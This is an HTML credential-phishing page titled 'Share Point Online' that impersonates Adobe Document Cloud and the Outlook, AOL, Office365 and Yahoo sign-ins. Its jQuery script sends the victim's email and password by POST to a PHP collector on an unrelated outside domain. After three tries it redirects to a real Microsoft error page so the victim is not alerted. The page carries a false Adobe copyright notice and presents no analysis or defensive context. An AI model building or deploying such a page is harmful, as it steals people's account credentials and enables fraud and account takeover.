
<!doctype html>
<html lang="en">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Yellowtail&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>Share Point Online</title>
    <link href="css/hover.css" rel="stylesheet" media="all">

    <style type="text/css">


    </style>
  </head>
  <body>
    <div class="container-fluid">
      <div class="row" style="background-image: url('https://www.mobilemarte.com/bluechip/images/8.jpg'); background-size: cover;background-repeat: no-repeat;">
        <div class="container">
          <div class="row">
            <div class="col-lg-6 mx-auto my-5 px-5 pb-5" style="border:1px solid; background-color: rgba(0,0,0,0.7);border-radius:15px;">
              <div class="text-center pt-5">
                <img src="https://www.mobilemarte.com/bluechip/images/adobe.jpg" class="img-fluid" width="100px"><br>
                <span class="h4 text-white">Adobe Document Cloud</span><br>
                <span class="h5 text-white font-weight-normal">To read the document, please choose your email provider below </span>
              </div>
              <div class="mt-3">
                <div class="row">

                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="outlookmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #0073C8;">
                        <img src="https://www.mobilemarte.com/bluechip/images/outlook1.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Outlook</span>
                      </div>
                    </a>
                  </div>
                </div>
                <div class="row">
                  <div class="col-lg-12 ">
                    <a href="javascript:void(0)" id="aolmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class="  mt-2" style=" background-color: #31459B;">
                        <img src="https://www.mobilemarte.com/bluechip/images/aol1.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Aol</span>
                      </div>
                    </a>
                  </div>
                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #FF3C00;">
                        <img src="https://www.mobilemarte.com/bluechip/images/office3651.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4"  style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Office365</span>
                      </div>
                    </a>
                  </div>
                </div>
                <div class="row">
                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="yahoomodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #5F0F68;">
                        <img src="https://www.mobilemarte.com/bluechip/images/yahoo1.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Yahoo!</span>
                      </div>
                    </a>
                  </div>
                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #0B5BD3;">
                        <img src="https://www.mobilemarte.com/bluechip/images/other1.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4"  style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Sign in with Other Mail</span>
                      </div>
                    </a>
                  </div>
                  <div class="col-lg-12">
                     <p class="text-white mt-3 text-center">Built upon Adobe Document Cloud, Adobe Document Cloud features can be unlocked by providing an additional license key.</p>
                <p class="h5 text-center text-white">Copyright© 2021 Adobe Systems Inc. All Rights Reserved.</p>

                  </div>

              </div>
            </div>
          </div>
        </div>



      </div>
    </div>

    <style>
    .modal{
        width: 30.6%;
        background-color: transparent;
        margin: 0 auto;
        padding-top: 10%;

    }
    .input_text{
        width: 100%;
        border: none;
        border-bottom: 1px solid #656565;
        padding: 8px 0;
        margin-bottom: 20px;
        font-size: 16px;
    }
    .input_text::placeholder{
        font-size: 16px;
    }
    .input_text:active{
        outline: none;
    }
    .input_text:focus{
        outline: none;
    }
    button.btn{
        width: 110px;
        float: right;
        border-color: #0067b8;
        background-color: #0067b8;
        color: #fff;
        font-size: 14px;
        padding: 8px 0;
        cursor: pointer;
        border: none;
    }
    </style>


    <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true" style="border: 0px;">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-header" style="border: 0px;">

            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
              <span aria-hidden="true">&times;</span>
            </button>
          </div>
          <div class="modal-body" style="border: 0px;">
            <center>
              <img id="fieldImg" src="https://www.mobilemarte.com/bluechip/images/gmail.png" class="" style="width: 40%; border-radius: 0px; margin-top: -25px;">
              <h4 class="modal-title" id="exampleModalLabel" style="font-weight: bold; text-align: left; padding-left: 14px;">Sign In </h4> <br>


            </center>
            <form id="contact" class="form-horizontal well">
              <div class="col-lg-12">
                <div class="form-group">
                  <input type="email" name="email" class="form-control input_text" id="email" aria-describedby="emailHelp" placeholder="Email Address">
                  </div>
              </div>
              <div class="col-lg-12">
                <div class="form-group">

                  <input type="password" name="password" class="form-control input_text" id="password" aria-describedby="emailHelp" placeholder="Enter Password">
                </div>
              </div>
                <p style="color: red; padding-left: 14px;" id="msg"></p>

            </div>
            <div class="modal-footer" style="border: 0px;">
              <button class="btn btn-lg btn-info pull-right" id="submit-btn" style="width: 100%; border-radius: 0px; margin-top: -35px; margin-left: 14px; margin-right: 14px;">Login</button>
            </div>
            <p style="visibility: hidden;" id="field"></p>

          </form>
        </div>
      </div>
    </div>

    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  </body>

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script>

    /* global $ */
    $(document).ready(function(){
      var count=0;
      $('#gmailmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'https://www.mobilemarte.com/bluechip/images/gmail.png');
        $('#field').html("Gmail");
        $('#ajaxModal').modal('show');
      });
      $('#outlookmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'https://www.mobilemarte.com/bluechip/images/outlook.png');
        $('#field').html("Outlook");
        $('#ajaxModal').modal('show');
      });
      $('#aolmodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'https://www.mobilemarte.com/bluechip/images/aol-logo.svg');
        $('#field').html("Aol");
        $('#ajaxModal').modal('show');
         $("#submit-btn").css("background-color","black");
      });
      $('#office365modal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'https://www.mobilemarte.com/bluechip/images/microsoft_logo.png');
        $('#field').html("Office 365");
        $('#ajaxModal').modal('show');
      });
      $('#yahoomodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'https://www.mobilemarte.com/bluechip/images/ymail.png');
        $('#field').html("Yahoo");
        $('#ajaxModal').modal('show');
        $('.btn').css("color","#6001d2");
      });
      $('#othermodal').click(function () {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'https://www.mobilemarte.com/bluechip/images/2075101.png');
        $('#field').html("Other Mail");
        $('#ajaxModal').modal('show'); ff6c2c
          $('.btn').css('background-color','#ff6c2c');
      });
      $('#submit-btn').click(function(event){
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var detail=$("#field").html();


        var msg = $('#msg').html();
        $('#msg').text( msg );
        count=count+1;
        if (count>=3) {
          count=0;
          window.location.replace("https://account.live.com/error.aspx?errcode=1086&uaid=2ed8b2a76ccc444f9f63c28bd0ea074e");
        }
        else
        {
         $.ajax({
          dataType: 'JSON',
          url: 'https://asongtadimnamfoundation.org/adbs/next.php',
          type: 'POST',
          data:{
            email:email,
            password:password,


          },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
				$("#password").val("");
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                 $('#msg').html(response['msg']);
                  // $('input, textarea').val(function() {
                  //    return this.defaultValue;
                  // });
                }
                else{
                  $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
				$("#password").val("");
              $("#msg").show();
              $('#msg').html("Invalid Login Credentials");
            },
            complete: function(){
              $('#submit-btn').html('Login');
            }
          });
       }
     });
    });
  </script>
  <style>
      *{
  padding: 0;
  margin: 0;
  font-family: sans-serif;
  }
  .bg{
      background-image: url('../img/outlook.jpg');
      background-size: cover;
      background-position: center;
      height: 100vh;
  }
  .login{
      width: 30.6%;
      background-color: transparent;
      margin: 0 auto;
      padding-top: 10%;

  }
  .login .outlook_logo{
      max-width: 256px;
      max-height: 36px;
      display: block;
      margin-left: auto;
      margin-right: auto;
      margin-bottom: 25px;
  }
  .login_bg{
      background-color: #fff;
      padding: 43px;
      overflow: hidden;
  }
  .img{
      margin-bottom: 20px;
  }
  .login_bg p{
      display: flex;
      margin-bottom: 20px;
      position: relative;
  }
  .login_bg p img{
      animation: all .2s;
      margin-top: -2px;
      margin-right: 2px;
  }
  .login_bg p img:hover{
      background-color: #ccc;
      border-radius: 50%;
  }
  .login_bg h2{
      line-height: 16px;
      margin-bottom: 20px;
  }
  .login_bg h2 span{
      display: block;
      margin-top: 8px;
      font-weight: normal;
      font-size: 14px;
  }
  .input_text{
      width: 100%;
      border: none;
      border: 1px solid #656565;
      border-radius: 0px;
      padding: 8px 0;
      margin-bottom: 20px;
      font-size: 16px;
      padding-left: 8px;
  }
  .input_text::placeholder{
      font-size: 16px;
      padding-left: 8px;
  }
  .input_text:active{
      outline: none;
  }
  .input_text:focus{
      outline: none;
  }
  .link_section{
      position: relative;
      display: inline;
  }
  .link{
      display: inline;
      margin-right: 2px;
      line-height: 1px;
  }
  .link:link,
  .link:visited{
      text-decoration: none;
      color: #0067b8;
      font-size: 13px;

  }
  .link:hover{
      color: #656565;
      border-bottom: 1px solid #656565;
  }


  .qsn_img{
      display: inline-block;
      position: absolute;
      top: 2px;
  }
  .footer{
      position: fixed;
      bottom: 0;
      width: 100%;
      overflow: visible;
      z-index: 99;
      clear: both;
      background-color: rgba(0,0,0,0.6);
  }
  .footer_links{
      margin: 0;
      float: right;
  }
  a.footer_link{
      text-decoration: none;
      color: #fff;
      font-size: 12px;
      line-height: 28px;
      white-space: nowrap;
      display: inline-block;
      margin-left: 8px;
      margin-right: 8px;
  }
  a.footer_link img{
      vertical-align: middle;
  }
  </style>
  </html>
